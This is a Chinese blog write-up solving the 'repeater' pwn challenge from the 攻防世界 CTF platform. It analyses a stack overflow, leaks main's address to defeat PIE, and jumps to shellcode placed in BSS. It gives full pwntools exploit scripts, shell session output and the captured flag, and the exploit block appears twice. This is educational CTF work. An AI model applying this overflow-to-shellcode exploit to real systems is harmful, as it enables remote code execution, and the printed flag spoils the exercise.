repeater-攻防世界
text:0000000000000B04
from pwn import *
sh = remote('61.147.171.105',65382)
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())
print(shellcode)
sh.sendlineafter('name :',shellcode)
num = 3281697
payload = b'A'*0x20 + p64(num)
sh.sendlineafter('input :',payload)
sh.recvuntil('you :\n0x')
main_addr = int(sh.recv(12),16)
shellcode_addr = main_addr + 0x202040 - 0xa33
payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)
sh.sendlineafter('input :',payload2)
sh.interactive()
giantbranch@ubuntu:~/Desktop/study$ python repeater3.py
[+] Opening connection to 61.147.171.105 on port 65382: Done
[*] Switching to interactive mode
sorry... I can't.....
$ id
sh: 2: id: not found
$ ls
bin
dev
flag
lib
lib32
lib64
repeater
$ cat flag
cyberpeace{603b286e263cce0e4b1a381e544c3e42}
[*] Got EOF while reading in interactive
$
[*] Interrupted
[*] Closed connection to 61.147.171.105 port 65382
giantbranch@ubuntu:~/Desktop/study$ python repeater3.py
[+] Opening connection to 61.147.171.105 on port 65382: Done
jhH\xb8/bin///sPH\x89�hri\x814$1�V^H�VH\x89�1�j;X\x0f\x05
[*] Switching to interactive mode
sorry... I can't.....
$ cat flag
cyberpeace{603b286e263cce0e4b1a381e544c3e42}
[*] Got EOF while reading in interactive
$
ß参考:
本文作者: C0ngvv
本文链接: https://www.cnblogs.com/C0ngvv/p/16658316.html
关于博主: 评论和私信会在第一时间回复。或者直接私信我。
版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主: 如果您觉得文章对您有帮助,可以点击文章右下角**【推荐】**一下。
攻防世界 repeater 题解
查看程序保护情况,开启了PIE
,没开NX
,RELRO
全开。
在ida64中打开分析程序,这道题程序比较简单。可以发现的信息如下:
- 字符数组
s
大小为0x20
,但可以读入0x40
的长度,起始于rbp-30h
处(见红框) - 变量
v5
可以控制循环、条件控制输出main
函数地址,该变量位于rbp-20h
字符数组s
空间后(见粉框) - 通过字符串
s
溢出可控制变量v5
的值及函数返回地址 - 程序运行起始可输入数据到内存BSS段(见蓝框)
根据这些信息,这道题的思路就出来了:
- 程序起始运行,提示输入
name
时,输入一段shellcode
(将存储到byte_202040
处) - 通过字符串
s
溢出控制变量v5
的值为3281697
,从而泄露出main
函数地址 - 通过
main
函数地址及byte_202040
与main
地址偏移,获得shellcode
代码地址 - 构造溢出输入,覆盖返回地址,使程序跳转到
shellcode
执行,获得系统shell
这道题还是非常简单的,只是我在做的时候shellcode
没选对,导致一直没利用成功(忘记改arch
值)。
下面是这道题的完整代码:
from pwn import *
sh = remote('61.147.171.105',50187)
# 通过输入name向BSS段写入shellcode
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())
sh.sendlineafter('name :',shellcode)
# 通过输入内容溢出修改控制变量值,泄露main地址
num = 3281697
payload = b'A'*0x20 + p64(num)
sh.sendlineafter('input :',payload)
sh.recvuntil('you :\n0x')
main_addr = int(sh.recv(12),16)
# 再次通过输入内容溢出,将函数返回地址改为shellcode地址
shellcode_addr = main_addr + 0x202040 - 0xa33
payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)
sh.sendlineafter('input :',payload2)
sh.interactive()
执行结果如图:
[攻防世界 repeater 题解](